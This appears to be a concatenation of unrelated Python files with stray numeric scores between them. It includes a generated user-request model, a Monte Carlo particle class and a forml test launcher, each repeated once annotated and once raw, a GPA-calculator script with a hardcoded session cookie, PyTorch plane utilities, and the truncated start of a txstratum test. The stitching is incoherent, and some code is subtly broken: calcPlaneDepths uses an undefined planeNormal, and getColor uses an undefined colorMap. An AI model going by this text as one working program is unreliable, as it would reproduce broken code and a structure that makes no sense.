:param password: The password of this UserCreateRequest.
:type password: str
"""
if password is None:
raise ValueError("Invalid value for `password`, must not be `None`") # noqa: E501
self._password = password
@property
def name(self):
"""Gets the name of this UserCreateRequest.
:return: The name of this UserCreateRequest.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this UserCreateRequest.
:param name: The name of this UserCreateRequest.
:type name: str
"""
self._name = name
@property
def avatar_url(self):
"""Gets the avatar_url of this UserCreateRequest.
:return: The avatar_url of this UserCreateRequest.
:rtype: str
"""
return self._avatar_url
@avatar_url.setter
def avatar_url(self, avatar_url):
"""Sets the avatar_url of this UserCreateRequest.
:param avatar_url: The avatar_url of this UserCreateRequest.
:type avatar_url: str
"""
self._avatar_url = avatar_url
@property
def bio(self):
"""Gets the bio of this UserCreateRequest.
:return: The bio of this UserCreateRequest.
:rtype: str
"""
return self._bio
@bio.setter
def bio(self, bio):
"""Sets the bio of this UserCreateRequest.
:param bio: The bio of this UserCreateRequest.
:type bio: str
"""
self._bio = bio | 0.755457 | 0.068444 |
import numpy as np
import matplotlib.pyplot as plt
import random
import detector as dct
class Particle:
    """A Monte Carlo transport particle: position, direction cosines,
    energy and a statistical weight used for survival bookkeeping."""

    def __init__(self, id, pos, mu, energy):
        self.id = id
        # position components
        self.__x = pos[0]
        self.__y = pos[1]
        self.__z = pos[2]
        # direction cosines (assumed normalized -- TODO confirm at call sites)
        self.__mu_x = mu[0]
        self.__mu_y = mu[1]
        self.__mu_z = mu[2]
        # bug fix: the energy argument was accepted but silently discarded
        # (self.__energy was hard-coded to 0)
        self.__energy = energy
        self.__weight = 1
        self.__is_alive = True

    @property
    def mu(self):
        """Direction cosines as [mu_x, mu_y, mu_z]."""
        return [self.__mu_x, self.__mu_y, self.__mu_z]

    @property
    def position(self):
        """Current position as [x, y, z]."""
        return [self.__x, self.__y, self.__z]

    @property
    def energy(self):
        return self.__energy

    @property
    def is_alive(self):
        """False once the weight has dropped below the survival threshold."""
        return self.__is_alive

    @position.setter
    def position(self, value):
        self.__x = value[0]
        self.__y = value[1]
        self.__z = value[2]

    @energy.setter
    def energy(self, value):
        self.__energy = value

    def pprint(self):
        """Print position and direction cosines on one line."""
        print(self.__x, self.__y, self.__z, self.__mu_x, self.__mu_y, self.__mu_z)

    def gen_random_angles(self):
        """Sample an isotropic scattering direction.

        Returns a dict with the cosine/sine of the polar angle theta and
        of the azimuthal angle phi.
        """
        # bug fix: theta and phi were both derived from the SAME random
        # number, correlating the two angles; isotropic sampling requires
        # two independent draws.
        zeta_mu = random.random()
        zeta_phi = random.random()
        phi = 2 * np.pi * zeta_phi
        cos_theta = 2 * zeta_mu - 1
        return {
            "cos_theta": cos_theta,
            "sin_theta": np.sqrt(1 - cos_theta**2),
            "cos_phi": np.cos(phi),
            "sin_phi": np.sin(phi),
        }

    def update_weight(self, mu_t, mu_a):
        """Scale the weight by the non-absorbed fraction and kill the
        particle once it falls below the survival threshold.

        :param mu_t: total attenuation coefficient
        :param mu_a: absorption coefficient
        """
        threshold = 0.2
        self.__weight = self.__weight * (1 - mu_a / mu_t)
        if self.__weight < threshold:
            self.__is_alive = False

    def is_in_detector(self, detector):
        """Return True if this particle lies inside `detector`.

        Raises Warning when the volume is not a dct.Detector instance.
        """
        if not isinstance(detector, dct.Detector):
            raise Warning("Volume is not a detector")
        return bool(detector.parametric_check(self))

    def evolve(self, s):
        """Advance the particle a path length s along its direction."""
        self.__x = self.__x + self.__mu_x * s
        self.__y = self.__y + self.__mu_y * s
        self.__z = self.__z + self.__mu_z * s

    def update_energy(self, cos_theta):
        """Energy update after scattering -- not implemented yet (TODO)."""
        pass

    def update_cosines(self, sin_theta, cos_theta, sin_phi, cos_phi):
        """Rotate the direction cosines by scattering angles (theta, phi).

        Uses the standard direction-cosine rotation; the degenerate case
        |mu_z| ~ 1 (travel along z) is handled separately to avoid the
        division by zero the original code hit for vertical directions.
        """
        mu_x, mu_y, mu_z = self.__mu_x, self.__mu_y, self.__mu_z
        denom = np.sqrt(1 - mu_z**2)
        if denom < 1e-10:
            # (anti)parallel to z: rotate in a freshly chosen frame
            sign = 1.0 if mu_z > 0 else -1.0
            self.__mu_x = sin_theta * cos_phi
            self.__mu_y = sign * sin_theta * sin_phi
            self.__mu_z = sign * cos_theta
        else:
            # bug fix: the original omitted the cos_phi factor in the
            # mu_x/mu_y cross terms, which does not preserve |mu| = 1
            self.__mu_x = sin_theta * (mu_x * mu_z * cos_phi - mu_y * sin_phi) / denom + mu_x * cos_theta
            self.__mu_y = sin_theta * (mu_y * mu_z * cos_phi + mu_x * sin_phi) / denom + mu_y * cos_theta
            self.__mu_z = -sin_theta * cos_phi * denom + mu_z * cos_theta
import matplotlib.pyplot as plt
import random
import detector as dct
class Particle:
def __init__(self,id,pos,mu,energy):
self.id = id
self.__x = pos[0]
self.__y = pos[1]
self.__z = pos[2]
self.__mu_x = mu[0]
self.__mu_y = mu[1]
self.__mu_z = mu[2]
self.__energy = 0
self.__weight = 1
self.__is_alive = True
@property
def mu(self):
return [self.__mu_x,self.__mu_y, self.__mu_z]
@property
def position(self):
return [self.__x, self.__y, self.__z]
@property
def energy(self):
return self.__energy
@property
def is_alive(self):
return self.__is_alive
@position.setter
def position(self, value):
self.__x = value[0]
self.__y = value[1]
self.__z = value[2]
@energy.setter
def energy(self, value):
self.__energy = value
def pprint(self):
print(self.__x,self.__y,self.__z,self.__mu_x,self.__mu_y, self.__mu_z)
def gen_random_angles(self):
angle_data = {}
zeta = random.random()
phi = 2*np.pi*zeta
angle_data["cos_theta"] = 2*zeta - 1
angle_data["sin_theta"] = np.sqrt(1 - angle_data["cos_theta"]**2)
angle_data["cos_phi"] = np.cos(phi)
angle_data["sin_phi"] = np.sin(phi)
return angle_data
def update_weight(self,mu_t,mu_a):
treshold = 0.2
self.__weight = self.__weight*(1- mu_a/mu_t)
if self.__weight < treshold:
self.__is_alive = False
def is_in_detector(self,detector):
# check if the particle is in the detector
if isinstance(detector, dct.Detector):
if detector.parametric_check(self):
return True
else:
return False
else:
raise Warning("Volume is not a detector")
def evolve(self,s):
self.__x = self.__x + self.__mu_x*s
self.__y = self.__y + self.__mu_y*s
self.__z = self.__z + self.__mu_z*s
def update_energy(self, cos_theta):
pass
def update_cosines(self, sin_theta, cos_theta, sin_phi, cos_phi):
# we update to the new cosines after interaction
self.__mu_x = sin_theta*(self.__mu_x*self.__mu_z - self.__mu_y*sin_phi)/(np.sqrt(1 - self.__mu_z**2)) + self.__mu_x*cos_theta
self.__mu_y = sin_theta*(self.__mu_y*self.__mu_z + self.__mu_x*sin_phi)/(np.sqrt(1 - self.__mu_z**2)) + self.__mu_y*cos_theta
self.__mu_z = -sin_theta*cos_phi*np.sqrt(1 - self.__mu_z**2) + self.__mu_z*cos_theta | 0.644449 | 0.431165 |
import logging
import typing
import uuid
from forml import flow, io, project
from forml.conf.parsed import provider as provcfg
from forml.io import dsl, layout
from forml.runtime import facility
from forml.testing import _spec
LOGGER = logging.getLogger(__name__)
class DataSet(dsl.Schema):
    """Testing schema.
    The actual fields are irrelevant.
    """
    # a single feature/label pair is enough for operator testing;
    # the concrete column types carry no meaning here
    feature: dsl.Field = dsl.Field(dsl.Integer())
    label: dsl.Field = dsl.Field(dsl.Float())
class Feed(io.Feed[None, typing.Any], alias='testing'):
    """Special feed to input the test cases."""
    def __init__(self, scenario: _spec.Scenario.Input, **kwargs):
        super().__init__(**kwargs)
        # the scenario carries the train/label/apply payloads that this
        # feed serves in place of a real data source
        self._scenario: _spec.Scenario.Input = scenario
    # pylint: disable=unused-argument
    @classmethod
    def reader(
        cls, sources: typing.Mapping[dsl.Source, None], features: typing.Mapping[dsl.Feature, typing.Any], **kwargs
    ) -> typing.Callable[[dsl.Query], typing.Sequence[typing.Sequence[typing.Any]]]:
        """Return the reader instance of this feed (any callable, presumably extract.Reader)."""
        def read(query: dsl.Query) -> typing.Any:
            """Reader callback.
            Args:
                query: Input query instance.
            Returns:
                Data.
            """
            # a query selecting the label column serves the train/label
            # payload; any other query serves the apply payload
            return features[DataSet.label] if DataSet.label in query.features else features[DataSet.feature]
        return read
    @classmethod
    def slicer(
        cls, schema: typing.Sequence[dsl.Feature], features: typing.Mapping[dsl.Feature, typing.Any]
    ) -> typing.Callable[[layout.ColumnMajor, typing.Union[slice, int]], layout.ColumnMajor]:
        """Return the slicer instance of this feed, that is able to split the loaded dataset column-wise."""
        # take the requested slice of the column-major payload, then its
        # first element -- matches the (payload, ...) tuples built in
        # the features mapping below
        return lambda c, s: c[s][0]
    @property
    def sources(self) -> typing.Mapping[dsl.Source, None]:
        """The explicit sources mapping implemented by this feed to be used by the query parser."""
        return {DataSet: None}
    @property
    def features(self) -> typing.Mapping[dsl.Feature, typing.Any]:
        """The explicit features mapping implemented by this feed to be used by the query parser."""
        return {DataSet.label: (self._scenario.train, [self._scenario.label]), DataSet.feature: self._scenario.apply}
class Launcher:
    """Test runner is a minimal forml pipeline wrapping the tested operator."""
    class Initializer(flow.Visitor):
        """Visitor that tries to instantiate each node in attempt to validate it."""
        def __init__(self):
            # group ids already visited, so each worker spec is built once
            self._gids: set[uuid.UUID] = set()
        def visit_node(self, node: flow.Worker) -> None:
            # node.spec() forces actor instantiation, surfacing any
            # construction-time errors in the tested operator
            if isinstance(node, flow.Worker) and node.gid not in self._gids:
                self._gids.add(node.gid)
                node.spec()
    def __init__(self, params: _spec.Scenario.Params, scenario: _spec.Scenario.Input, runner: provcfg.Runner):
        self._params: _spec.Scenario.Params = params
        # minimal query: single feature column with the label as training target
        self._source: project.Source = project.Source.query(DataSet.select(DataSet.feature), DataSet.label)
        self._feed: Feed = Feed(scenario)
        self._runner: provcfg.Runner = runner
    def __call__(self, operator: type[flow.Operator]) -> facility.Virtual.Builder:
        """Build a virtual launcher for the given operator type.

        The operator is instantiated with the scenario parameters and its
        expanded apply/train/label segments are validated node-by-node
        before the pipeline is bound to the source and feed.
        """
        instance = operator(*self._params.args, **self._params.kwargs)
        initializer = self.Initializer()
        segment = instance.expand()
        # validate all three task graphs by instantiating their nodes
        segment.apply.accept(initializer)
        segment.train.accept(initializer)
        segment.label.accept(initializer)
        return self._source.bind(instance).launcher(self._runner, [self._feed])
import typing
import uuid
from forml import flow, io, project
from forml.conf.parsed import provider as provcfg
from forml.io import dsl, layout
from forml.runtime import facility
from forml.testing import _spec
LOGGER = logging.getLogger(__name__)
class DataSet(dsl.Schema):
"""Testing schema.
The actual fields are irrelevant.
"""
feature: dsl.Field = dsl.Field(dsl.Integer())
label: dsl.Field = dsl.Field(dsl.Float())
class Feed(io.Feed[None, typing.Any], alias='testing'):
"""Special feed to input the test cases."""
def __init__(self, scenario: _spec.Scenario.Input, **kwargs):
super().__init__(**kwargs)
self._scenario: _spec.Scenario.Input = scenario
# pylint: disable=unused-argument
@classmethod
def reader(
cls, sources: typing.Mapping[dsl.Source, None], features: typing.Mapping[dsl.Feature, typing.Any], **kwargs
) -> typing.Callable[[dsl.Query], typing.Sequence[typing.Sequence[typing.Any]]]:
"""Return the reader instance of this feed (any callable, presumably extract.Reader)."""
def read(query: dsl.Query) -> typing.Any:
"""Reader callback.
Args:
query: Input query instance.
Returns:
Data.
"""
return features[DataSet.label] if DataSet.label in query.features else features[DataSet.feature]
return read
@classmethod
def slicer(
cls, schema: typing.Sequence[dsl.Feature], features: typing.Mapping[dsl.Feature, typing.Any]
) -> typing.Callable[[layout.ColumnMajor, typing.Union[slice, int]], layout.ColumnMajor]:
"""Return the slicer instance of this feed, that is able to split the loaded dataset column-wise."""
return lambda c, s: c[s][0]
@property
def sources(self) -> typing.Mapping[dsl.Source, None]:
"""The explicit sources mapping implemented by this feed to be used by the query parser."""
return {DataSet: None}
@property
def features(self) -> typing.Mapping[dsl.Feature, typing.Any]:
"""The explicit features mapping implemented by this feed to be used by the query parser."""
return {DataSet.label: (self._scenario.train, [self._scenario.label]), DataSet.feature: self._scenario.apply}
class Launcher:
"""Test runner is a minimal forml pipeline wrapping the tested operator."""
class Initializer(flow.Visitor):
"""Visitor that tries to instantiate each node in attempt to validate it."""
def __init__(self):
self._gids: set[uuid.UUID] = set()
def visit_node(self, node: flow.Worker) -> None:
if isinstance(node, flow.Worker) and node.gid not in self._gids:
self._gids.add(node.gid)
node.spec()
def __init__(self, params: _spec.Scenario.Params, scenario: _spec.Scenario.Input, runner: provcfg.Runner):
self._params: _spec.Scenario.Params = params
self._source: project.Source = project.Source.query(DataSet.select(DataSet.feature), DataSet.label)
self._feed: Feed = Feed(scenario)
self._runner: provcfg.Runner = runner
def __call__(self, operator: type[flow.Operator]) -> facility.Virtual.Builder:
instance = operator(*self._params.args, **self._params.kwargs)
initializer = self.Initializer()
segment = instance.expand()
segment.apply.accept(initializer)
segment.train.accept(initializer)
segment.label.accept(initializer)
return self._source.bind(instance).launcher(self._runner, [self._feed]) | 0.863521 | 0.414425 |
# Cookie
import requests
import pandas as pd
from bs4 import BeautifulSoup
headers = {
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36',
'Cookie':'JSESSIONID=68E5E9087DD3404B3502CD3077A8CDB4',
}
url = 'http://172.16.17.32:8080/jsxsd/xk/LoginToXk'
session = requests.Session()
response = session.get('http://172.16.17.32:8080/jsxsd/kscj/cjcx_list', headers=headers)
df = pd.read_html(response.text)[0]
# 我们需要的一共是三列 第一列是课程名称 第二列是绩点 第三列是学分
# 因为我们需要先对数据进行处理 所以我们可以先把课程名称和绩点作为字典
# key:课程名称 values:字典
column_dict = dict(zip(df['课程名称'],df['学分']))
list1 = ["军事理论与训练","形势与政策","大学生职业生涯与规划","体育1","体育2","体育3","体育4"]
list2 = ["思想道德修养与法律基础","政治经济学","中国近现代史纲要","毛泽东思想和中国特色社会主义理论体系概论","马克思主义基本原理概论","书法鉴赏","道德修养和法律基础","英语口语"]
for key in column_dict.keys():
if key in list1:
column_dict[key] = 0.0
elif key in list2:
column_dict[key] = 1.0
elif key in ["大学英语1","大学英语2","大学英语3","大学英语4"]:
column_dict[key] = 2.0
# print(column_dict)
# 我们修改完学分之后需要对此成绩列做对应 我们可以把学分列取出来 然后和成绩共同组成一个列表
# w为了保证正确 我们可以现判断一下长度是否一致
print(column_dict)
list3 = []
for val in column_dict.keys():
list3.append(float(column_dict[val]))
# 我们接下来需要根据成绩修正绩点
list4 = []
for tem in df['成绩']:
if tem in ['优','良','中','合格','及格','不及格']:
# 此时说我们该项课程的成绩是五级分制
if tem == "优":
list4.append(4)
continue
elif tem =='良':
list4.append(3)
continue
elif tem =='中':
list4.append(2)
continue
elif tem =='及格' or tem =='合格':
list4.append(2)
continue
else:
list4.append(0)
continue
else:
tem = float(tem)
if tem >= 85:
list4.append(4)
elif tem>=75 and tem <= 84:
list4.append(3)
elif tem>=60 and tem <=74:
list4.append(2)
elif tem <60:
list4.append(0)
# print(list4)
# 我们现在已经得到修正过后的绩点列 现在把学分和绩点整合到一个list中
# print(list3)
list_final = [list4,list3]
sum_score=0.0
for i in list3:
sum_score+=i
print(sum_score)
sum = 0.0
for i in range(0,len(list4)):
sum += list_final[0][i] * list_final[1][i]
print(sum)
final = float(sum)/float(sum_score)
print(">>>欢迎来到李博文的绩点查询系统>>>")
print(final)
# print(list_final)
# print(list_final[0][0])
# print(list_final[1][0]) | main.py |
# Cookie
import requests
import pandas as pd
from bs4 import BeautifulSoup
headers = {
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36',
'Cookie':'JSESSIONID=68E5E9087DD3404B3502CD3077A8CDB4',
}
url = 'http://172.16.17.32:8080/jsxsd/xk/LoginToXk'
session = requests.Session()
response = session.get('http://172.16.17.32:8080/jsxsd/kscj/cjcx_list', headers=headers)
df = pd.read_html(response.text)[0]
# 我们需要的一共是三列 第一列是课程名称 第二列是绩点 第三列是学分
# 因为我们需要先对数据进行处理 所以我们可以先把课程名称和绩点作为字典
# key:课程名称 values:字典
column_dict = dict(zip(df['课程名称'],df['学分']))
list1 = ["军事理论与训练","形势与政策","大学生职业生涯与规划","体育1","体育2","体育3","体育4"]
list2 = ["思想道德修养与法律基础","政治经济学","中国近现代史纲要","毛泽东思想和中国特色社会主义理论体系概论","马克思主义基本原理概论","书法鉴赏","道德修养和法律基础","英语口语"]
for key in column_dict.keys():
if key in list1:
column_dict[key] = 0.0
elif key in list2:
column_dict[key] = 1.0
elif key in ["大学英语1","大学英语2","大学英语3","大学英语4"]:
column_dict[key] = 2.0
# print(column_dict)
# 我们修改完学分之后需要对此成绩列做对应 我们可以把学分列取出来 然后和成绩共同组成一个列表
# w为了保证正确 我们可以现判断一下长度是否一致
print(column_dict)
list3 = []
for val in column_dict.keys():
list3.append(float(column_dict[val]))
# 我们接下来需要根据成绩修正绩点
list4 = []
for tem in df['成绩']:
if tem in ['优','良','中','合格','及格','不及格']:
# 此时说我们该项课程的成绩是五级分制
if tem == "优":
list4.append(4)
continue
elif tem =='良':
list4.append(3)
continue
elif tem =='中':
list4.append(2)
continue
elif tem =='及格' or tem =='合格':
list4.append(2)
continue
else:
list4.append(0)
continue
else:
tem = float(tem)
if tem >= 85:
list4.append(4)
elif tem>=75 and tem <= 84:
list4.append(3)
elif tem>=60 and tem <=74:
list4.append(2)
elif tem <60:
list4.append(0)
# print(list4)
# 我们现在已经得到修正过后的绩点列 现在把学分和绩点整合到一个list中
# print(list3)
list_final = [list4,list3]
sum_score=0.0
for i in list3:
sum_score+=i
print(sum_score)
sum = 0.0
for i in range(0,len(list4)):
sum += list_final[0][i] * list_final[1][i]
print(sum)
final = float(sum)/float(sum_score)
print(">>>欢迎来到李博文的绩点查询系统>>>")
print(final)
# print(list_final)
# print(list_final[0][0])
# print(list_final[1][0]) | 0.053169 | 0.285364 |
import numpy as np
import cv2
#MEAN_STD = [[0.29010095242892997, 0.32808144844279574, 0.28696394422942517], [0.1829540508368939, 0.18656561047509476, 0.18447508988480435]]
MEAN_STD = np.array([[0.5, 0.5, 0.5], [1, 1, 1]], dtype=np.float32)
MAX_DEPTH = 10
## Global color mapping
class ColorPalette:
def __init__(self, numColors):
np.random.seed(1)
self.colorMap = np.array([[255, 0, 0],
[0, 255, 0],
[0, 0, 255],
[80, 128, 255],
[128, 0, 255],
[255, 0, 255],
[0, 255, 255],
[255, 0, 128],
[255, 255, 0],
[0, 128, 255],
[50, 150, 0],
[200, 255, 255],
[255, 200, 255],
[128, 128, 80],
[0, 50, 128],
[0, 100, 100],
[0, 255, 128],
[100, 0, 0],
[0, 100, 0],
[255, 230, 180],
[255, 128, 0],
[128, 255, 0],
], dtype=np.uint8)
self.colorMap = np.maximum(self.colorMap, 1)
if numColors > self.colorMap.shape[0]:
self.colorMap = np.concatenate([self.colorMap, np.random.randint(255, size = (numColors - self.colorMap.shape[0], 3), dtype=np.uint8)], axis=0)
pass
#self.colorMap = np.random.randint(255, size = (numColors, 3), dtype=np.uint8)
#self.colorMap[0] = np.maximum(self.colorMap[0], 1)
return
def getColorMap(self):
return self.colorMap
def getColor(self, index):
if index >= colorMap.shape[0]:
return np.random.randint(255, size = (3), dtype=np.uint8)
else:
return self.colorMap[index]
pass
return
## Draw segmentation image. The input could be either HxW or HxWxC
def drawSegmentationImage(segmentations, numColors=42, blackIndex=-1, blackThreshold=-1):
if segmentations.ndim == 2:
numColors = max(numColors, segmentations.max() + 2)
else:
if blackThreshold > 0:
segmentations = np.concatenate([segmentations, np.ones((segmentations.shape[0], segmentations.shape[1], 1)) * blackThreshold], axis=2)
blackIndex = segmentations.shape[2] - 1
pass
numColors = max(numColors, segmentations.shape[2] + 2)
pass
randomColor = ColorPalette(numColors).getColorMap()
if blackIndex >= 0:
randomColor[blackIndex] = 0
pass
width = segmentations.shape[1]
height = segmentations.shape[0]
if segmentations.ndim == 3:
#segmentation = (np.argmax(segmentations, 2) + 1) * (np.max(segmentations, 2) > 0.5)
segmentation = np.argmax(segmentations, 2)
else:
segmentation = segmentations
pass
segmentation = segmentation.astype(np.int32)
return randomColor[segmentation.reshape(-1)].reshape((height, width, 3))
## Draw depth image
def drawDepthImage(depth):
depthImage = np.clip(depth / 5 * 255, 0, 255).astype(np.uint8)
depthImage = cv2.applyColorMap(255 - depthImage, colormap=cv2.COLORMAP_JET)
return depthImage
## Math operations
def softmax(values):
exp = np.exp(values - values.max())
return exp / exp.sum(-1, keepdims=True)
def one_hot(values, depth):
maxInds = values.reshape(-1)
results = np.zeros([maxInds.shape[0], depth])
results[np.arange(maxInds.shape[0]), maxInds] = 1
results = results.reshape(list(values.shape) + [depth])
return results
def sigmoid(values):
return 1 / (1 + np.exp(-values))
## Fit a 3D plane from points
def fitPlane(points):
if points.shape[0] == points.shape[1]:
return np.linalg.solve(points, np.ones(points.shape[0]))
else:
return np.linalg.lstsq(points, np.ones(points.shape[0]))[0]
return
## Metadata to intrinsics
def metadataToIntrinsics(metadata):
intrinsics = np.zeros((3, 3))
intrinsics[0][0] = metadata[0]
intrinsics[1][1] = metadata[1]
intrinsics[0][2] = metadata[2]
intrinsics[1][2] = metadata[3]
intrinsics[2][2] = 1
return intrinsics
## The function to compute plane depths from plane parameters
def calcPlaneDepths(planes, width, height, metadata):
urange = (np.arange(width, dtype=np.float32).reshape(1, -1).repeat(height, 0) / (width + 1) * (metadata[4] + 1) - metadata[2]) / metadata[0]
vrange = (np.arange(height, dtype=np.float32).reshape(-1, 1).repeat(width, 1) / (height + 1) * (metadata[5] + 1) - metadata[3]) / metadata[1]
ranges = np.stack([urange, np.ones(urange.shape), -vrange], axis=-1)
planeOffsets = np.linalg.norm(planes, axis=-1, keepdims=True)
planeNormals = planes / np.maximum(planeOffsets, 1e-4)
normalXYZ = np.dot(ranges, planeNormal.transpose())
normalXYZ[normalXYZ == 0] = 1e-4
planeDepths = planeOffsets / normalXYZ
planeDepths = np.clip(planeDepths, 0, MAX_DEPTH)
return planeDepths | pytorch/utils.py | import numpy as np
import cv2
#MEAN_STD = [[0.29010095242892997, 0.32808144844279574, 0.28696394422942517], [0.1829540508368939, 0.18656561047509476, 0.18447508988480435]]
MEAN_STD = np.array([[0.5, 0.5, 0.5], [1, 1, 1]], dtype=np.float32)
MAX_DEPTH = 10
## Global color mapping
class ColorPalette:
def __init__(self, numColors):
np.random.seed(1)
self.colorMap = np.array([[255, 0, 0],
[0, 255, 0],
[0, 0, 255],
[80, 128, 255],
[128, 0, 255],
[255, 0, 255],
[0, 255, 255],
[255, 0, 128],
[255, 255, 0],
[0, 128, 255],
[50, 150, 0],
[200, 255, 255],
[255, 200, 255],
[128, 128, 80],
[0, 50, 128],
[0, 100, 100],
[0, 255, 128],
[100, 0, 0],
[0, 100, 0],
[255, 230, 180],
[255, 128, 0],
[128, 255, 0],
], dtype=np.uint8)
self.colorMap = np.maximum(self.colorMap, 1)
if numColors > self.colorMap.shape[0]:
self.colorMap = np.concatenate([self.colorMap, np.random.randint(255, size = (numColors - self.colorMap.shape[0], 3), dtype=np.uint8)], axis=0)
pass
#self.colorMap = np.random.randint(255, size = (numColors, 3), dtype=np.uint8)
#self.colorMap[0] = np.maximum(self.colorMap[0], 1)
return
def getColorMap(self):
return self.colorMap
def getColor(self, index):
if index >= colorMap.shape[0]:
return np.random.randint(255, size = (3), dtype=np.uint8)
else:
return self.colorMap[index]
pass
return
## Draw segmentation image. The input could be either HxW or HxWxC
def drawSegmentationImage(segmentations, numColors=42, blackIndex=-1, blackThreshold=-1):
if segmentations.ndim == 2:
numColors = max(numColors, segmentations.max() + 2)
else:
if blackThreshold > 0:
segmentations = np.concatenate([segmentations, np.ones((segmentations.shape[0], segmentations.shape[1], 1)) * blackThreshold], axis=2)
blackIndex = segmentations.shape[2] - 1
pass
numColors = max(numColors, segmentations.shape[2] + 2)
pass
randomColor = ColorPalette(numColors).getColorMap()
if blackIndex >= 0:
randomColor[blackIndex] = 0
pass
width = segmentations.shape[1]
height = segmentations.shape[0]
if segmentations.ndim == 3:
#segmentation = (np.argmax(segmentations, 2) + 1) * (np.max(segmentations, 2) > 0.5)
segmentation = np.argmax(segmentations, 2)
else:
segmentation = segmentations
pass
segmentation = segmentation.astype(np.int32)
return randomColor[segmentation.reshape(-1)].reshape((height, width, 3))
## Draw depth image
def drawDepthImage(depth):
depthImage = np.clip(depth / 5 * 255, 0, 255).astype(np.uint8)
depthImage = cv2.applyColorMap(255 - depthImage, colormap=cv2.COLORMAP_JET)
return depthImage
## Math operations
def softmax(values):
exp = np.exp(values - values.max())
return exp / exp.sum(-1, keepdims=True)
def one_hot(values, depth):
maxInds = values.reshape(-1)
results = np.zeros([maxInds.shape[0], depth])
results[np.arange(maxInds.shape[0]), maxInds] = 1
results = results.reshape(list(values.shape) + [depth])
return results
def sigmoid(values):
return 1 / (1 + np.exp(-values))
## Fit a 3D plane from points
def fitPlane(points):
if points.shape[0] == points.shape[1]:
return np.linalg.solve(points, np.ones(points.shape[0]))
else:
return np.linalg.lstsq(points, np.ones(points.shape[0]))[0]
return
## Metadata to intrinsics
def metadataToIntrinsics(metadata):
intrinsics = np.zeros((3, 3))
intrinsics[0][0] = metadata[0]
intrinsics[1][1] = metadata[1]
intrinsics[0][2] = metadata[2]
intrinsics[1][2] = metadata[3]
intrinsics[2][2] = 1
return intrinsics
## The function to compute plane depths from plane parameters
def calcPlaneDepths(planes, width, height, metadata):
urange = (np.arange(width, dtype=np.float32).reshape(1, -1).repeat(height, 0) / (width + 1) * (metadata[4] + 1) - metadata[2]) / metadata[0]
vrange = (np.arange(height, dtype=np.float32).reshape(-1, 1).repeat(width, 1) / (height + 1) * (metadata[5] + 1) - metadata[3]) / metadata[1]
ranges = np.stack([urange, np.ones(urange.shape), -vrange], axis=-1)
planeOffsets = np.linalg.norm(planes, axis=-1, keepdims=True)
planeNormals = planes / np.maximum(planeOffsets, 1e-4)
normalXYZ = np.dot(ranges, planeNormal.transpose())
normalXYZ[normalXYZ == 0] = 1e-4
planeDepths = planeOffsets / normalXYZ
planeDepths = np.clip(planeDepths, 0, MAX_DEPTH)
return planeDepths | 0.510496 | 0.382545 |
import asyncio
import unittest
from collections import deque
from typing import List, Optional
from unittest.mock import ANY, MagicMock, Mock
import asynctest # type: ignore
from hathorlib.client import BlockTemplate, HathorClient
import txstratum.time
from txstratum.jobs import JobStatus, TxJob
from txstratum.manager import TxMiningManager
from txstratum.protocol import StratumProtocol
TX1_DATA = bytes.fromhex(
'0001000102000000000000089c0d40a9b1edfb499bc624833fde87ae459d495000393f4aaa00006'
'a473045022100c407d5e8f411f9ae582ebd7acbfcb6ea6170332709fb69acaa34c1b426f1d8f502'
'2003847963768eca9bcdf46e758319fb2699fd28ab657d00f54bef46c37a90405e2103755f2920f'
'f7dc32dc5414cea1cf9e078347f40894caf0c03637d083dbb261c5c000003e800001976a914a04c'
'9e2a0291f53c618fdad2ecb37748efb0eeeb88ac0000151800001976a914545f1156a3b00df622b'
'1d92968c21b962e9d7aa588ac4032a8228c4020c35ed18547020000000047c9881d2bf348d5ffd6'
'ce8398d6bc5d17b3bea75a53c15b7480be950000006ed5794bf69ebe7d7d75e7a0024d98acb85cb'
'9c101b59b8b6073e8667c84e2ee77'
)
TX1_NONCE = '84e2ee77'
TX2_DATA = bytes.fromhex(
'00010001020000000000000896f3792cf52e13978baa98ac966639946b558190f52d1d8c4900006a473045'
'022100cf557f80e59f4cc142dfeff28b54321c1787bc6faddb798093b9bd4e6fa32c60022055fbf4312f08'
'19748a6480e0d1f7d70276b3cc12276d973f991bdb2f22250b972103755f2920ff7dc32dc5414cea1cf9e0'
'78347f40894caf0c03637d083dbb261c5c0000170c00001976a914a04c9e2a0291f53c618fdad2ecb37748'
'efb0eeeb88ac000001f400001976a914a04c9e2a0291f53c618fdad2ecb37748efb0eeeb88ac4032a8228c'
'4020c35ed184d5020000006ed5794bf69ebe7d7d75e7a0024d98acb85cb9c101b59b8b6073e8667c000001'
'2a9d7b6a8895fc1fde992187e742eff81ad2e40994b595cc45056d7bb333cf514a'
)
TX2_NONCE = '33cf514a'
TOKEN_CREATION_TX_DATA = bytes.fromhex(
'00020104000005551d7740fd7d3c0acc50b5677fdd844f1225985aa431e1712af2a2fd'
'8900006a473045022100a445edb5cd6c79a0a7b5ed837582fd65b8d511ee60b64fd076'
'e07bd8f63f75a202202dca24320bffc4c3ca2a07cdfff38f7c839bde70ed49ef634ac6'
'588972836cab2103bfa995d676e3c0ed7b863c74cfef9683fab3163b42b6f21442326a'
'023fc57fba0000264800001976a9146876f9578221fdb678d4e8376503098a9228b132'
'88ac00004e2001001976a914031761ef85a24603203c97e75af355b83209f08f88ac00'
'00000181001976a9149f091256cb98649c7c35df0aad44d7805710691e88ac00000002'
'81001976a914b1d7a5ee505ad4d3b93ea1a5162ba83d5049ec4e88ac0109546f546865'
'4d6f6f6e04f09f9a804034a52aec6cece75e0fc0e30200001a72272f48339fcc5d5ec5'
'deaf197855964b0eb912e8c6eefe00928b6cf600001055641c20b71871ed2c5c7d4096'
'<KEY>'
)
TOKEN_CREATION_TX_NONCE = '01ff7369'
class HathorClientTest(HathorClient):
def __init__(self, server_url: str, api_version: str = '/v1a/'):
self._current_index = 0
BLOCK_DATA_1 = bytes.fromhex('000001ffffffe8b789180000001976a9147fd4ae0e4fb2d2854e76d359029d8078bb9'
'9649e88ac40350000000000005e0f84a9000000000000000000000000000000278a7e')
BLOCK_DATA_2 = bytes.fromhex('0000010000190000001976a9143d6dbcbf6e67b2cbcc3225994756a56a5e2d3a2788a'
'c40350000000000005e0f84de03000006cb93385b8b87a545a1cbb6197e6caff600c1'
